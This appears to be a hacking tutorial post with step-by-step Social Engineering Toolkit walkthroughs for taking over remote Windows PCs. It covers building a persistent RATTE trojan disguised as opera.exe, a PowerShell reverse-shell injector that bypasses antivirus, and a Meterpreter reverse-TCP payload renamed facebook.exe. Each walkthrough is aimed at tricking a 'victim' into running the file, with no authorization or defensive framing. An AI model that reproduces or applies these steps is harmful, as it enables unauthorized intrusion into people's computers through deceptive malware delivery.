Hack Remote Windows PC using Ratte Server in Social Engineering Toolkit

Open your backtrack terminal & Type cd /pentest/exploits/set

Now Open Social Engineering Toolkit (SET). /set

Now choose 3, “Third Party Modules

Now choose 1, “RATTE (Remote Administration Tool Tommy Edition)

Enter the IP address to connect back on: 192.168.1.2 (IP address of Your PC)

Port RATTE Server should listen on: Press Enter here

Should RATTE be persistent: yes

Use specifix file name: opera.exe

After we successfully generate the malicious exe File, it will stored on your local computer

/src/program_junk/ratteM.exe

Now send your ratteM.exe files to victim, as soon as they download and open it

Start the ratteserver listerner now: yes

Now chosse option 1 List Clients

If the payload been executed successfully, then you will see a new session and the client details. Note down the session number. Enter the session you want to interact with: press 0 here

Now choose option 2 “activate client”

Now you will get a menu with lot of option selects 1, start shell

Hack Windows7 PC using Powershell Attack Vector in Social Engineering Toolkit (Bypassing Antivirus)

The Powershell Attack Vector module allows you to create PowerShell specific attacks. These attacks will allow you to use PowerShell which is available by default in all operating systems Windows Vista and above. PowerShell provides a fruitful landscape for deploying payloads and performing functions that do not get triggered by

Preventative Technologies.

  • Powershell Alphanumeric Shellcode Injector
  • Powershell Reverse Shell
  • Powershell Bind Shell
  • Powershell Dump SAM Database

Open your backtrack terminal & Type cd /pentest/exploits/set

Now Open Social Engineering Toolkit (SET). /set

Now choose 1, “Social-Engineering Attacks

Now choose 10, “Powershell Attack Vector

Now choose 1, “Powershell Alphanumeric Shellcode Injector” and type IP address of Your PC for Reverse Connection.

Now create the exploit code for 32 and 64 bit Windows:

Now is retrieve the Powershell code that SET created. The code is saved in /pentest/exploits/set/reports/powershell/x64_powershell_injection.txt

Now send your x64_powershell_injection.txt files to victim via chat or email or any social engineering technique and convene the victim to open x64_powershell_injection.txt and Paste it into a Windows 7 command prompt

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

Hack Remote PC using Payload in BackTrack 5

Open Your Backtrack terminal and Type cd  /pentest/exploits/set

Now Open Social Engineering Toolkit (SET) ./set

Now choose option 1, “Social-Engineering Attacks

Now choose option 4, “Create Payload and Listener

Now choose 2 “Windows Reverse_TCP Meterpreter”, but you have several to choose from including your own program.

Now choose 2 “shikata-ga-nai

Now choose a port for the listener, choose a random port 443 and then I choose Yes on starting a listener.

Now a file name msf.exe has been created, you can get the file by going on file system–>pentest>exploit–>set–>msf.exe

Now rename the file anything you want. In my case I am renaming it facebook.exe

Now upload your exe on file sharing website like filesonic, rapidshare, and megaupload. In my case I am using 4shared.com now send link to the victim. 

As soon as our victim downloads and executes our facebook.exe, now you have access to the victims PC

Use “Sessions -l” and the Session number to connect to the session.  Now Type “session s -i ID“.